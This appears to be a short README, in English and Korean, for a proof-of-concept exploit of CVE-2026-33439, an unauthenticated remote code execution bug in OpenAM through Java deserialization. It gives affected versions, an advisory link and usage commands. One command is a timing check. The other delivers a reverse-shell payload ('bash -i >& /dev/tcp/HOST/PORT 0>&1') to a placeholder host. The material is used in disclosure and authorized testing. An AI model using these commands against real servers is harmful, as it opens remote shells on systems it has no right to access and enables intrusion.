
Proof of concept for CVE-2026-33439, an unauthenticated RCE in OpenAM via Java deserialization
jato.clientSession 파라미터의 안전하지 않은 Java 역직렬화를 통한 OpenIdentityPlatform OpenAM의 인증 전 RCE입니다. 영향받는 버전 <= 16.0.5, 16.0.6에서 수정되었습니다.
Advisory: https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-2cqq-rpvq-g5qj
time ./cve-2026-33439.py --url https://TARGET/openam --command 'sleep 3' # takes about 3 seconds
./cve-2026-33439.py --url https://TARGET/openam --command 'bash -i >& /dev/tcp/HOST/PORT 0>&1'
출력은 블라인드입니다. 요청은 명령이 종료될 때까지 블록되므로, 타이밍으로 실행을 확인할 수 있습니다 (--command 'sleep 5'는 약 5초가 걸립니다).
승인된 보안 테스트 전용입니다.